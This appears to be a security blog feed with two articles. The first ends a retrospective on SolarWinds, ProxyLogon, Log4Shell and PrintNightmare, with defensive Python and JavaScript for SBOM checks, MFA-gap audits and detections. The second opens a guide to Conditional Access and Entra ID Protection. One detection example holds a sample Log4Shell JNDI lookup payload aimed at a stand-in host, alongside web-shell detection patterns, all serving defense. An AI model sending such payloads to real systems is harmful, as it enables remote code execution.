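    return tuple(int(part) for part in version.split("."))


# Affected range is [introduced, fixed_in). Illustrative subset only.
ADVISORIES = [
    {"cve": "CVE-2021-44228", "name": "log4j-core", "introduced": "2.0", "fixed_in": "2.15.0"},
    {"cve": "CVE-2021-45046", "name": "log4j-core", "introduced": "2.0", "fixed_in": "2.16.0"},
]


def known_vulnerable(sbom, advisories=ADVISORIES):
    """Return (name, version, cve) for every component inside an affected range."""
    hits = []
    for component in sbom:
        version = parse_version(component["version"])
        for adv in advisories:
            if component["name"] != adv["name"]:
                continue
            if parse_version(adv["introduced"]) <= version < parse_version(adv["fixed_in"]):
                hits.append((component["name"], component["version"], adv["cve"]))
    return hits
```

Note what the function cannot do: a component outside every listed range returns no hits whether it is safe or merely not yet known to be unsafe. A host patched to 2.15.0 looked clean against the first advisory until the second one was published.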

The same-privilege paradox at the orchestration plane. A Zero Trust policy engine that decides every access decision is itself a privileged component. If the policy engine is compromised, the decisions it produces are not trustworthy, and the resources downstream of the engine cannot tell legitimate decisions from forged ones. Microsoft's "Assume Breach" third principle [@ms-zt-overview] is the operational acknowledgment that this ceiling is unsolved rather than closed -- "Assume Breach" is a posture for limiting blast radius after compromise, not a mechanism for preventing the compromise of the orchestration plane itself.

The 1984 result was load-bearing in December 2020. The 1953 theorem was load-bearing in December 2021. Both are still load-bearing, and the post-2023 stack does not close either.

9. Five Things 2026 Still Cannot Do

The Generation 5 stack walked in Section 6 is a necessary architectural pivot. It is not sufficient. Five honest residuals close out the open-problem framing.

Build-pipeline trust at scale. SLSA Build Level 3 adoption remains incomplete in 2026. Reproducible builds are still a research aspiration on most Linux distributions and an aspirational footnote on Windows. The median enterprise cannot answer "did this binary come from this source commit?" with cryptographic evidence; the answer in practice is "the vendor's release notes say so." in-toto attestations [@in-toto-home] cover specific build steps in mature deployments. The Generation 5 stack reduces the surface SUNBURST exploited; it does not foreclose it.

Identity-provider compromise as a class. Storm-0558 (disclosed July 2023, with the full root-cause investigation published in September 2023) is the post-window existence proof that the policy engine itself is a privileged plane [@msrc-storm-0558]. A 2021 crash dump that should not have contained signing-key material did contain Microsoft's consumer Microsoft account (MSA) signing key; an engineer-account compromise enabled exfiltration of the dump; a validation flaw in Microsoft's enterprise token validation allowed consumer keys to sign enterprise tokens; the attacker forged Outlook Web Access and Exchange Online tokens for approximately twenty-five organizations, including U.S. State Department mailboxes. The incident is queued for Part 6.

Storm-0558. Microsoft's designation for the China-based threat actor responsible for the July 2023 forged-token campaign against Outlook Web Access and Exchange Online, affecting approximately twenty-five organizations including U.S. State Department mailboxes [@msrc-storm-0558]. The incident sits outside this article's December 2021 closing window and structures Part 6 of the series.

Part 6 of this series picks up the trust-root layer where Generation 5 left it. The architectural shape of the next era is the question Storm-0558 opened: if the identity provider's signing key is the trust root, what closes the compromise of that key as a class? Plausible answers in 2026 include shorter-lived signing keys with cryptographic attestation of issuance, threshold-signed identity providers that require multi-party participation in key use, sender-constrained tokens (DPoP) that bind tokens to specific client keys, and hardware-rooted attestation chains for identity-provider infrastructure. All of these are research-grade or early-deployment as of this article; the trust-root layer is the architectural frontier the post-2023 incidents have foregrounded.

Cross-vendor and managed-service-provider supply chains. The SolarWinds-class lesson did not generalize. The 3CX VoIP-client supply-chain compromise in March 2023 (attributed to UNC4736, a suspected North Korean nexus cluster Mandiant linked to Lazarus-class operations) [@mandiant-3cx-2023], the MOVEit file-transfer mass-exploitation by Cl0p in May-June 2023 [@cisa-aa23-158a], and the Change Healthcare [@unitedhealth-changehc-8k] and CDK Global [@cyberscoop-cdk-2024] cascades in 2024 demonstrated that the build-pipeline-trust lesson translated unevenly across third-party data-transfer and managed-service-provider classes. SLSA and SBOM are necessary tooling; they have not produced a population-level change in cross-vendor supply-chain risk.

The 2023-2024 supply-chain cascade (3CX, MOVEit, Change Healthcare, CDK Global) is the empirical reply to the "SolarWinds taught the industry" narrative. The lesson taught the industry to look for build-pipeline compromise of large software vendors; it did not, at the population level, teach the industry to look for the same class of compromise in mid-market communications, file-transfer, and dealer-management vendors. The structural problem the four-incident cluster of 2020-2021 named is still operative.

Conditional Access policy drift. Mature Microsoft Entra tenants routinely carry dozens of Conditional Access policies, with overlapping conditions, exclusions, and break-glass account exceptions. The cloud-identity equivalent of BloodHound -- a graph-analysis approach to enumerating reachable Tier-0 identities and policy bypasses -- remains research-grade in 2026. AzureHound and BloodHound Community Edition [@bloodhound-specterops] extend the on-premises model to the cloud, but production tooling for policy-graph analysis has not yet reached parity with the rate at which CA policies accumulate.
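Even without a full policy graph, one drift question is answerable with set arithmetic: which users are not covered by any enabled policy that requires MFA once exclusions are applied? The sketch below assumes a simplified, hypothetical policy shape (`state`, `include`, `exclude`, `grant_controls`) with group membership already expanded to user names; it is not the Microsoft Graph schema, and it ignores conditions such as application, location, and device platform.

```python
def mfa_gaps(users, policies):
    """Return users that no enabled MFA-requiring policy applies to."""
    all_users = set(users)
    covered = set()
    for policy in policies:
        if policy["state"] != "enabled" or "mfa" not in policy["grant_controls"]:
            continue  # report-only or non-MFA policies provide no coverage
        if "All" in policy["include"]:
            included = set(all_users)
        else:
            included = set(policy["include"]) & all_users
        covered |= included - set(policy["exclude"])
    return sorted(all_users - covered)
```

Break-glass accounts are expected to appear in the output. The drift signal is everything else that appears alongside them, typically accounts excluded "temporarily" from one policy and never picked up by another.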

SBOM as forensics tool versus prevention tool. The Log4Shell IR experience demonstrated SBOM's forensics utility: organizations that had SBOM data answered "are we exposed?" in hours, while organizations without it took weeks. The prevention utility -- refusing to install software whose components fail policy -- has been slower to mature, both because component-policy semantics are not standardized and because the practical effect would be a substantial change to the enterprise software procurement model.

10. What a Practitioner Does Today

If you are reading this on a Monday, here is what you do this week, this quarter, this year, and what you stop trying to do entirely.

Lane 1: Preventive hygiene. Inventory vendor build-pipeline exposure. Which vendors push signed code to your endpoints? Which auto-update? Which are deployed via SCCM, Intune, or Workspace ONE? The inventory is the SolarWinds homework. Inventory internet-facing pre-auth surfaces (the ProxyLogon homework).

For build pipelines you own, the operational answer to the SUNSPOT lesson is the four-primitive chain that OpenSSF's SLSA v1.0 framework calls Build Level 3 [@slsa-v1-requirements]:

GitHub Actions OIDC ID tokens as workflow-bound short-lived identities, requested by setting `id-token: write` under `permissions` in the workflow YAML. The token's claims bind the job to a named repository, workflow file, and ref [@github-oidc-docs].
Sigstore Fulcio as the public-good keyless-signing certificate authority. Fulcio accepts the OIDC token plus an in-memory ephemeral keypair and returns a ~10-minute X.509 cert with the workflow SAN encoded into it [@sigstore-ccs2022, @cosign-signing-overview].
cosign signs the artifact with the ephemeral key and uploads the signature, certificate, and transparency-proof bundle [@cosign-signing-overview].
Rekor, the Trillian-backed Merkle-tree transparency log at rekor.sigstore.dev, returns a signed entry timestamp that asserts the signature existed before any later attacker could back-date it [@sigstore-rekor-docs].
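The first link in that chain, the workflow-bound identity, comes down to a handful of claims inside the OIDC token. The sketch below decodes a token payload and compares the issuer, the `sub` claim, and the `job_workflow_ref` claim against expected values. It deliberately skips signature verification, so it is suitable only for inspecting a token's contents, never for trusting one; `decode_payload_unverified` and `claims_match` are hypothetical helper names, and the `sub` format shown is the default for branch-triggered runs.

```python
import base64
import json

GITHUB_ISSUER = "https://token.actions.githubusercontent.com"


def decode_payload_unverified(jwt: str) -> dict:
    """Decode the JWT payload WITHOUT checking the signature (inspection only)."""
    payload_b64 = jwt.split(".")[1]
    padded = payload_b64 + "=" * (-len(payload_b64) % 4)
    return json.loads(base64.urlsafe_b64decode(padded))


def claims_match(claims: dict, repo: str, ref: str, workflow_path: str) -> bool:
    """Check that the claims name the expected repository, ref, and workflow file."""
    return (
        claims.get("iss") == GITHUB_ISSUER
        and claims.get("sub") == f"repo:{repo}:ref:{ref}"
        and claims.get("job_workflow_ref") == f"{repo}/{workflow_path}@{ref}"
    )
```

In the real chain Fulcio performs the verified version of this check and writes the resulting identity into the certificate, which is what lets a downstream verifier pin an artifact to one workflow file at one ref instead of to a key.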

No human signing key. No long-lived signing cert. No manual rotation. Every signing event is publicly auditable. SLSA Build Level 3 provenance is generated by the build platform itself through the OpenSSF reference reusable workflow slsa-framework/slsa-github-generator and attested through the same cosign + Rekor lane [@slsa-gh-generator]. Pair the chain with one of three SBOM-attestation tools as the predicate payload: Microsoft's sbom-tool for SPDX 2.2 / 3.0 drops on Microsoft-stack artifacts [@ms-sbom-tool], Anchore's syft for multi-language SPDX + CycloneDX generation natively paired with the Grype vulnerability scanner [@anchore-syft], or Aqua Security's trivy for single-step SBOM plus CVE plus IaC plus license plus secret scanning [@aquasec-trivy].

SLSA Build Level 3: The OpenSSF SLSA framework's third Build-track level [@slsa-v1-requirements], reached when a build produces provenance that is *unforgeable* relative to the build platform itself. SLSA v1.0 (April 2023) defines three Build levels: L1 requires that provenance exists; L2 requires that provenance is authentic (signed by the build platform); L3 requires that provenance is unforgeable -- that is, the build platform's own identity is the signer, and no tenant on the build platform can produce provenance attributable to another tenant. Build L3 is what closes the SUNSPOT class for hosted-CI environments: even a tenant who controls their own build job cannot forge provenance for somebody else's artifact.

Sigstore: The Linux Foundation public-good keyless-signing project, composed of three components: **Fulcio**, a certificate authority that issues short-lived (~10-minute) X.509 certificates binding an ephemeral keypair to an OpenID Connect identity claim; **cosign**, the command-line tool that orchestrates the keyless-signing workflow against Fulcio and Rekor; and **Rekor**, an append-only transparency log built on Google's Trillian Merkle-tree library that records every signing event and returns a signed entry timestamp [@sigstore-ccs2022, @cosign-signing-overview, @sigstore-rekor-docs]. The architectural property Sigstore delivers is the elimination of long-lived signing keys: a build job that runs for ten minutes signs an artifact with a key that exists only for the duration of the job, after which both the key and the certificate expire.

The canonical command-level tutorial for the Lane 1 chain lives at the OpenSSF SLSA "Producing Artifacts" requirements page [@slsa-v1-requirements] and the slsa-framework/slsa-github-generator reusable-workflow README [@slsa-gh-generator]; this article is the architectural primer, not the command reference.

Enable LSA Protection on every endpoint that supports it -- not just new Windows 11 22H2 clean installs, but every system in the fleet that can carry the configuration [@ms-lsa-protection]. Enable the Vulnerable Driver Blocklist [@ms-driver-blocklist]. Disable the Print Spooler on Domain Controllers as standing policy, per CISA ED 21-04 [@cisa-ed-21-04]. Roll out Pluton where the OEM ships it enabled; audit "Pluton present but disabled" with the same rigor as "TPM present but disabled."

```javascript
// Logic equivalent of an audit script that lists trusted publishers
// on a Windows endpoint and flags auto-updating vendors as
// supply-chain-exposed. Demonstrates the inventory shape.

const trustedPublishers = [
  { name: 'SolarWinds Worldwide LLC', autoUpdate: true, deployment: 'SCCM' },
  { name: 'Microsoft Corporation', autoUpdate: true, deployment: 'WindowsUpdate' },
  { name: 'Adobe Inc.', autoUpdate: true, deployment: 'AdobeRMS' },
  { name: 'VMware Inc.', autoUpdate: false, deployment: 'manual' },
];

// Baseline score of 1; auto-update adds 2, fleet-management deployment adds 1.
function exposureScore(p) {
  let s = 1;
  if (p.autoUpdate) s += 2;
  if (p.deployment === 'SCCM' || p.deployment === 'Intune') s += 1;
  return s;
}

// Highest exposure first.
const ranked = trustedPublishers
  .map(p => ({ ...p, score: exposureScore(p) }))
  .sort((a, b) => b.score - a.score);

for (const p of ranked) {
  console.log(p.score + ' ' + p.name + ' (' + p.deployment + ')');
}
```

Lane 2: Detection deployment. Microsoft Defender for Identity has SACL-based detections for DCSync, Golden Ticket, and Golden SAML signal patterns; deploy them and tune. Microsoft Defender for Endpoint has web-shell detections for the ProxyLogon-class IUSR-spawned cmd.exe pattern; deploy them on every Exchange front-end. Deploy Sigma rules for the canonical post-exploitation fingerprints: the `${jndi:` substring in any logged event field for Log4Shell-class detection, and RpcAddPrinterDriverEx for PrintNightmare-class detection on Domain Controllers.
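The Log4Shell-class fingerprint can be sketched as the logic equivalent of a Sigma rule. This is a deliberately naive illustration: the event shape and field names are hypothetical, only top-level string fields are scanned, and a plain substring match misses nested-lookup obfuscations, so treat it as the shape of the check rather than a production detection.

```python
def contains_jndi_lookup(event: dict) -> bool:
    """Flag an event if any top-level string field contains '${jndi:'.

    Case-insensitive plain substring match. Obfuscated payloads that build
    the string through nested lookups will not match this check.
    """
    needle = "${jndi:"
    return any(
        isinstance(value, str) and needle in value.lower()
        for value in event.values()
    )


# Hypothetical web-server log events; field names are illustrative only.
suspicious = {
    "src_ip": "198.51.100.7",
    "user_agent": "${jndi:ldap://198.51.100.7:1389/a}",
    "status": 200,
}
benign = {
    "src_ip": "203.0.113.20",
    "user_agent": "Mozilla/5.0",
    "status": 200,
}

print(contains_jndi_lookup(suspicious))  # True
print(contains_jndi_lookup(benign))      # False
```

Scanning every field rather than one named header reflects the text's "any logged event field" wording: the payload fires wherever the vulnerable logger writes attacker-controlled input.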

For the Conditional Access policy drift surface §9 names as open-problem-3, three open-source tools form a complementary cohort. None subsumes the others; each closes a structurally distinct detection lane.

Maester is a PowerShell + Pester test-automation framework that wraps the Microsoft Graph Conditional Access "What If" evaluation API in the Test-MtConditionalAccessWhatIf cmdlet. It ships built-in test profiles aligned to the OMB M-22-09 phishing-resistant-MFA baseline and the CISA ZTMM v2.0 Identity-pillar Optimal stage, and is designed to run as a recurring GitHub Actions, Azure DevOps, or Azure Automation job [@maester-github, @maester-docs, @maester-ca-whatif]. Maester occupies the assertion lane: does the deployed CA-policy state pass an asserted baseline under What-If simulation?

CAOptics, Joosua Santasalo's Node.js permutation-enumeration tool, evaluates the (subject x app x condition) tuple space against the same Microsoft Graph CA-evaluation API and reports the gaps. It catches break-glass-account exclusion-clause interactions that Maester's assertion profiles do not exercise [@caoptics-github]. CAOptics occupies the gap-enumeration lane.

BloodHound Community Edition with the SpecterOps AzureHound collector is the cloud-side companion to SharpHound's on-premises Active Directory enumeration. The combined BloodHound CE graph models both on-premises and cloud-identity attack paths with explicit cross-boundary edges for Azure AD Connect, Pass-Through Authentication, hybrid-joined devices, and federated trusts [@azurehound-github, @bloodhound-azurehound-docs, @bloodhound-specterops]. BloodHound CE plus AzureHound occupies the graph-reachability lane: what is the set of lateral-movement paths from any identity to any Tier-0 cloud or on-premises identity?

Layer the three tools together. The composition is the operational closure of §5's "policy is code" claim against the §9 open-problem-3 detection lane.

CAOptics was archived read-only by its maintainer in August 2024 with the README note "Project archived due to shifting development priorities" [@caoptics-github]. The tool remains functional and architecturally canonical for the gap-enumeration lane; readers wanting active development for the graph-reachability lane should track SpecterOps's BloodHound CE AzureHound documentation [@bloodhound-azurehound-docs] for the rolling-release collector and BloodHound CE schema updates.

Logic equivalent of a Sigma rule for the ProxyLogon-class web-shell pivot. The rule matches the canonical fingerprint of an IIS worker spawning cmd.exe under the IUSR identity (Exchange front-end shells typically execute under IUSR_ after dropping into IIS).

```python
def matches_proxylogon_pivot(event):
    """Return True for an IIS worker spawning cmd.exe under an IUSR identity."""
    # `or ''` guards against fields that are present but set to None.
    parent = (event.get('parent_process_name') or '').lower()
    process = (event.get('process_name') or '').lower()
    user = (event.get('user_name') or '').lower()
    return (
        event.get('event_id') == 4688  # process creation
        and parent.endswith('w3wp.exe')
        and process.endswith('cmd.exe')
        and user.startswith('iusr')
    )


example = {
    'event_id': 4688,
    'parent_process_name': 'C:\\Windows\\System32\\inetsrv\\w3wp.exe',
    'process_name': 'C:\\Windows\\System32\\cmd.exe',
    'user_name': 'IUSR_EXCH01',
}
print('match' if matches_proxylogon_pivot(example) else 'no match')
```

Lane 3: Confirmed-compromise response. A confirmed signed-vendor-update compromise is a vendor-level incident. Rotate every secret the trojanized binary could have read. Treat ADFS token-signing certificates as compromised; rotate them with new private key material on hardware-attested storage where possible. Rotate krbtgt twice per the Microsoft AD Forest Recovery procedure to invalidate any forged Kerberos tickets. Assume Conditional Access policies were bypassed during the active window if Golden SAML was in play; review sign-in logs for the affected federated trust for the full intrusion window.

The double-krbtgt rotation is not paranoia. A single rotation invalidates tickets signed with the prior key; a second rotation, after the configured maximum-ticket-lifetime, ensures the prior-prior key is also retired and no ticket signed with either prior key is still valid. The Microsoft AD Forest Recovery procedure documents the operation explicitly, with a minimum 10-hour wait between resets to exceed the default Maximum-Lifetime-For-User-Ticket and Maximum-Lifetime-For-Service-Ticket policy values [@ms-ad-forest-recovery-krbtgt]. The procedure exists because the second rotation cannot happen until any in-flight ticket with the prior key has expired, and skipping it leaves a window in which forged tickets remain serviceable.
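The timing rule can be sketched as date arithmetic. This is a planning aid under stated assumptions, not part of the Microsoft procedure: the function name is hypothetical, and it takes the wait to be the larger of the 10-hour minimum cited above and whatever maximum ticket lifetime the domain actually configures.

```python
from datetime import datetime, timedelta

# Minimum wait between krbtgt resets, per the procedure cited above.
MIN_WAIT = timedelta(hours=10)


def earliest_second_reset(
    first_reset: datetime,
    max_ticket_lifetime: timedelta = MIN_WAIT,
) -> datetime:
    """Earliest time the second krbtgt reset should be scheduled.

    Assumption: a domain with a longer configured ticket lifetime must wait
    at least that long, and never less than the 10-hour minimum.
    """
    return first_reset + max(max_ticket_lifetime, MIN_WAIT)


first = datetime(2026, 1, 5, 9, 0)
print(earliest_second_reset(first))                       # 2026-01-05 19:00:00
print(earliest_second_reset(first, timedelta(hours=12)))  # 2026-01-05 21:00:00
```

Flooring the wait at ten hours means a domain with an unusually short configured lifetime still follows the documented minimum.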

Lane 4: What does not work. The operational anti-patterns the four incidents made expensive.

Note: Patching CVE-2021-26855 alone is insufficient if the web shell was already on disk before the patch -- the patch closes the entry; it does not remove the shell. Rotating krbtgt does not address Golden SAML; Golden SAML is a SAML-token-signing problem, and krbtgt is the Kerberos key. Rotating ADFS token-signing certificates is the corresponding action. Enabling Conditional Access for the identity the attacker forged tokens for is a closed-stable-door fix; Conditional Access enforcement happens at the resource server, and a forged SAML assertion already passed through the identity layer at the moment the resource server checks. Pluton on the workstation does not retroactively protect the Domain Controller -- Pluton is workstation-class silicon in 2023, and Server SKUs are a separate roadmap.

The FAQ closes the audit-flagged premises this article opened with.

11. Frequently Asked Questions

No. The canonical pre-auth chain is three CVEs: CVE-2021-26855 (server-side request forgery) into CVE-2021-26858 or CVE-2021-27065 (arbitrary file write) into an ASPX web shell at SYSTEM [@volexity-exchange-marauder, @tenable-exchange-zd]. CVE-2021-26857 is a separate insecure-deserialization RCE in Exchange Unified Messaging that requires authentication; it sits in a parallel position to the SSRF chain rather than as a fused step. The "four chained zero-days" shorthand collapses two distinct attack-class shapes and obscures the SSRF-as-load-bearing-primitive observation. Microsoft's March 2 advisories cover all four CVEs together because they were patched together, not because they were exploited as a single linear chain.

No. See §3.2 Blast radius for the breakdown: Krebs reported "at least 30,000" U.S. organizations pre-patch on March 5 [@krebs-hafnium-march5]; Bloomberg reported "as many as 60,000" worldwide on March 7 [@krebs-hafnium-march5]. The figure that runs toward 250,000 aggregates *post-patch* indiscriminate exploitation by multiple actor groups (LuckyMouse, Tick, Calypso, Winnti, and others, per ESET's March 10 ten-APT-groups analysis [@eset-exchange-10apt-2021]) in the weeks after Microsoft's March 2 advisory; it is not a pre-patch numerator.

The product was called Azure AD Identity Protection at the time. Azure AD Conditional Access (the policy engine) and Azure AD Identity Protection (the risk-signal source) were already integrated before 2021; the integration is what makes risk-based Conditional Access policies possible. The "Entra" brand was introduced on May 31, 2022 as a family umbrella in Vasu Jakkal's "Secure access for a connected world--meet Microsoft Entra" announcement on the Microsoft Security Blog [@ms-entra-launch-may2022], and the rename of Azure AD to Microsoft Entra ID -- and therefore of Azure AD Identity Protection to Microsoft Entra ID Protection -- happened on July 11, 2023 [@ms-entra-rebrand]. Citations to the 2021-2022 product should use the Azure AD naming; citations to the current product use Microsoft Entra ID.

No. NIST SP 800-207 [@nist-sp-800-207] references BeyondCorp as one production implementation of Zero Trust principles, alongside other implementations and prior architectural work. The document is a vendor-neutral synthesis of Kindervag's 2010 Forrester framing [@kindervag-2010-forrester], Forrester's ZTX taxonomy, Gartner's CARTA continuous-evaluation framing, federal TIC guidance, and BeyondCorp's worked example. "Zero Trust" predates BeyondCorp -- Kindervag coined the term in September 2010, four years before Ward and Beyer's first BeyondCorp paper [@ward-beyer-2014-usenix]. The marketing-collapsed reading of "Zero Trust equals BeyondCorp" or "Zero Trust equals Microsoft Conditional Access" obscures a thirteen-year intellectual chain.

The bug is in Apache Log4j, a Java logging library [@log4j-apache-security], and the affected versions are Log4j 2.0 through 2.14.1. The vulnerability is not Windows-specific. It belongs in this Windows-security series because the most enterprise-impactful exploitation in Windows-server fleets ran through Java applications hosted on Windows: Tomcat, JBoss, VMware vCenter and Horizon, Atlassian Confluence and Jamf Pro on Windows, and dozens of internal Java services running on Windows Server with embedded JREs. The architectural lesson -- that transitive dependency graphs are the new universal attack surface -- applies to every operating system that hosts Java, but Windows fleets were a substantial fraction of the affected population.

Both, depending on what is being counted. Pluton was announced on November 17, 2020 [@weston-2020-pluton]. The first commercial PCs to ship with Pluton enabled were the Lenovo ThinkPad Z13 and Z16 with AMD Ryzen 6000 SoCs, announced at CES 2022 on January 4, 2022 [@pluton-windows-blog-jan2022, @lenovo-thinkpad-z-press-jan2022] with general commercial availability starting in May 2022 per Lenovo's StoryHub pricing-and-availability disclosure [@lenovo-thinkpad-z-press-jan2022]. The chipset rollout broadened across 2022-2024 to include AMD Ryzen 7000, 8000, and 9000, Intel Core Ultra 200V and Series 3, and Qualcomm Snapdragon 8cx Gen 3 and X Series processors [@ms-pluton-learn]. Pluton present is not Pluton enabled -- OEMs can disable the processor at the firmware level via PSP directory entry 0xB bit 36 on AMD platforms [@mjg59-pluton] -- so fleet-management claims about Pluton deployment should distinguish "present" from "enabled and acting as the TPM."

The four incidents are the receipt the industry collected on a thirty-six-year-old prediction. The Generation 5 defensive stack is the vocabulary the industry borrowed to talk about what changed. The vocabulary is now sufficient. The trust roots are not. Part 6 picks up the trust-root layer where Generation 5 left it -- Storm-0558 (July 2023), the Microsoft consumer-MSA signing-key compromise that produced enterprise tokens Conditional Access could not distinguish from legitimate ones, and the architectural question it opened: if the policy engine itself is privileged, what closes the compromise of the policy engine as a class?

Who Decided This Token Is Good? A Field Guide to Conditional Access and Entra ID Protection

noreply@paragmali.com (Parag Mali) — Tue, 26 May 2026 00:00:00 GMT

**Conditional Access is Microsoft's Zero Trust policy engine, not a feature.** Every interactive sign-in to a licensed Microsoft 365 tenant flows through three planes: a signal plane (Entra ID Protection's machine-learning risk scoring), a policy plane (Conditional Access's JSON rule evaluator), and a session plane (Continuous Access Evaluation's event-driven revocation channel). This article assembles the wire format of all three -- the `riskDetection` resource on Microsoft Graph, the `conditionalAccessPolicy` schema, the `cp1` client capability that opts a client into 28-hour tokens, and the `401 + insufficient_claims` claims challenge -- into one end-to-end picture, then names the five things this architecture fundamentally cannot do.

1. Who decided this token is good?

It is 09:02 on a Tuesday in Lisbon. Alice opens Outlook on a managed laptop in a hotel and the reading pane populates with mail in under a second. She did not type a password. She did not approve a push. She did not touch a hardware key.

Who decided that was fine?

The question is harder than it looks. Alice's refresh token lives in a token cache from yesterday's sign-in at the office. Outlook's client silently acquires a fresh access token from Entra. That request may match a Conditional Access policy. The policy may consult an Identity Protection risk score. The result is either an access token or a refusal. Exchange Online receives the token, validates it, and may yet revoke it mid-session because something changed in the last sixty seconds. Bytes return to Alice.

Conditional Access: Microsoft Entra ID's policy engine for evaluating sign-in attempts. A Conditional Access policy is a JSON object that matches a set of users, cloud apps, and conditions (network location, device state, sign-in risk, user risk, client app, platform) against a set of grants (block, require MFA, require compliant device, require Authentication Strength, and so on). Policies are evaluated after first-factor authentication; a block grant in any matching policy overrides all allow grants [@ms-ca-overview].

Microsoft Entra ID Protection: The machine-learning signal plane that scores sign-ins and users for risk. ID Protection emits `riskDetection` events tagged with `riskEventType` (anonymized IP, leaked credentials, password spray, atypical travel, and roughly two dozen others), `riskLevel` (low, medium, high), `riskState`, and `detectionTimingType` (realtime, nearRealtime, or offline). Available only on Microsoft Entra ID P2 [@ms-id-protection-overview].

Continuous Access Evaluation (CAE): The session plane. CAE is an event-driven channel between Microsoft Entra and CAE-aware resource APIs (Exchange Online, SharePoint Online, Teams, Microsoft Graph). When a critical event fires -- account disabled, password reset, high user risk, network location change -- the resource API returns `HTTP 401` with a `WWW-Authenticate: Bearer error="insufficient_claims"` challenge. The client replays the embedded claims to Entra and acquires a fresh token. In exchange for this channel, CAE tokens live up to 28 hours [@ms-cae-concept].
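The "block overrides allow" rule is easier to see in a toy evaluator. This is a simplified sketch, not Microsoft's evaluator: the `Policy` class and `evaluate` function are hypothetical, conditions are reduced to user and app matching, and the AND/OR operator on grant controls is ignored, so every non-block grant from every matching policy is treated as required.

```python
from dataclasses import dataclass


@dataclass
class Policy:
    """Hypothetical, heavily reduced stand-in for a Conditional Access policy."""
    name: str
    users: set   # user ids, or {"All"}
    apps: set    # app ids, or {"All"}
    grants: set  # e.g. {"block"} or {"mfa", "compliantDevice"}


def evaluate(policies, user, app):
    """Return {"block"} if any matching policy blocks, else all required grants."""
    matching = [
        p for p in policies
        if ({"All", user} & p.users) and ({"All", app} & p.apps)
    ]
    # A single block grant in any matching policy wins over everything else.
    if any("block" in p.grants for p in matching):
        return {"block"}
    required = set()
    for p in matching:
        required |= p.grants
    return required


policies = [
    Policy("Require MFA for everyone", {"All"}, {"All"}, {"mfa"}),
    Policy("Block legacy app for alice", {"alice"}, {"legacy-app"}, {"block"}),
]

print(evaluate(policies, "alice", "legacy-app"))  # {'block'}
print(evaluate(policies, "alice", "outlook"))     # {'mfa'}
```

An empty result means no policy matched, which in this sketch stands for "no additional control required"; the real engine has more states than that.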

Every component in this chain is individually documented on Microsoft Learn. The Conditional Access policy schema is on the Graph reference [@ms-graph-capolicy]. The riskDetection resource is on the Graph reference too [@ms-graph-riskdetection]. The cp1 client capability is in the claims-challenge document [@ms-claims-challenge]. The "up to 15 minutes" propagation ceiling for CAE non-IP events is in the CAE concept document [@ms-cae-concept].

But the chain is not assembled anywhere. That is what this article does.

This article is for the architect or the detection engineer who already knows what a JWT is, what a service principal is, and what an MDM does. If you have ever stared at a Sign-in log entry that reads "Conditional Access: Success" and wondered what exactly the policy engine concluded, this is for you.

Three moments of insight are coming. First, why MFA without context fails not because MFA is weak but because the unit is wrong (Section 3). Second, why the architectural breakthrough was a separation and not a new algorithm (Section 5). Third, why the system has limits that no engineering will fix (Section 8).

How did the industry end up with a token-issuance and claims-challenge model? The answer begins in 1975, with a paper that did not mention identity once.

2. From perimeter to identity boundary

In September 1975, Jerome Saltzer and Michael Schroeder published an eight-principle paper on operating-system protection that nobody at MIT thought of as a paper about cloud identity [@saltzer-schroeder-1975]. Half a century later, two of those eight -- complete mediation and least privilege -- are the implicit theorems every Conditional Access policy evaluates against. Where did the industry go in between?

Saltzer and Schroeder: the unstated theorems

Complete mediation says "every access to every object must be checked for authority." Least privilege says "every program and every user of the system should operate using the least set of privileges necessary to complete the job." These are stated as design principles, not theorems. But they function as theorems for anyone building an access-control system: violate either of them and you have, by construction, a vulnerability. Conditional Access does not derive the principles. It re-states them as a JSON schema and a runtime evaluator.

Jericho Forum: the perimeter dissolves

In 2003, David Lacey of the Royal Mail and a loose affiliation of corporate CISOs began arguing, against the prevailing castle-and-moat consensus, that the corporate network perimeter could no longer be relied on as the trust boundary. The Jericho Forum formally launched under the Open Group umbrella in January 2004 [@wikipedia-jericho-forum]. They coined the term "de-perimeterisation" to describe what their member firms were already living: data and identity travelling outside the firewall faster than the firewall could be moved.

Microsoft's own retrospective puts the quote precisely: the Jericho Forum "promoted a new concept of security called de-perimeterisation that focused on how to protect enterprise data flowing in and out of your enterprise network boundary instead of striving to convince users and the business to keep it on the corporate network" [@simos-2020-jericho]. The first sentence of Microsoft Learn's CA overview today is a direct descendant: "modern security extends beyond an organization's network perimeter" [@ms-ca-overview].

Kindervag: the name

John Kindervag, then a principal analyst at Forrester Research, gave the model its marketable name in a September 2010 report titled "No More Chewy Centers: Introducing the Zero Trust Model of Information Security" [@kindervag-2010-zero-trust]. Three tenets: all resources are accessed securely regardless of location; access control is on strict need-to-know and strictly enforced; all traffic is inspected and logged.

The label stuck. Microsoft Learn now calls CA "Microsoft's Zero Trust policy engine" in its first sentence [@ms-ca-overview]. The lineage from Kindervag's 14-page Forrester report to that sentence is direct.

The original Kindervag PDF is gated behind Forrester's paywall. The widely cited copy on ndm.net redirects to an unrelated managed-IT-services company; the only reliably accessible mirror is the Wayback Machine snapshot. Treat the lineage as well documented and the URL as a curiosity of how academic ideas survive the open web.

BeyondCorp: the alternative

In December 2014, Rory Ward and Betsy Beyer published "BeyondCorp: A New Approach to Enterprise Security" in USENIX ;login: [@ward-beyer-2014-beyondcorp]. The paper described Google's internal Zero Trust deployment: every request authenticated and authorized by an access proxy, no implicit network trust, device inventory and user identity as the inputs to access decisions. A follow-up in 2016 documented the production rollout [@osborn-2016-beyondcorp].

This is the architectural fork Section 7 returns to. BeyondCorp puts the policy engine in the data path, as a reverse proxy that sees every HTTP request. CA puts the policy engine at token issuance and re-evaluates via claims challenges. Both work. They are not interchangeable.

NIST SP 800-207: the vocabulary

In August 2020, NIST published Special Publication 800-207, Zero Trust Architecture [@nist-sp-800-207-2020]. It codified the U.S. federal reference architecture: a Policy Engine that decides, a Policy Administrator that effects the decision, and a Policy Enforcement Point that intercepts the access.

That trio is the vocabulary the Microsoft Learn CA documentation now uses. In the SP 800-207 mapping, Conditional Access is the Policy Engine and Policy Administrator; Exchange Online, SharePoint Online, Teams, and Microsoft Graph are the Policy Enforcement Points; Entra ID Protection is the trust algorithm that feeds the Policy Engine.

If you ever have to map Conditional Access to SP 800-207 for a compliance review, the cleanest correspondences are: PE = the CA evaluator inside Entra; PA = Entra's token issuer (because the decision is effected by issuing or refusing a token); PEP = the resource API (Exchange, SharePoint, Graph) that validates the token, plus, for CAE-aware resources, the same API enforcing claims-challenge revocation mid-session. ID Protection is the "trust algorithm" input to the PE.

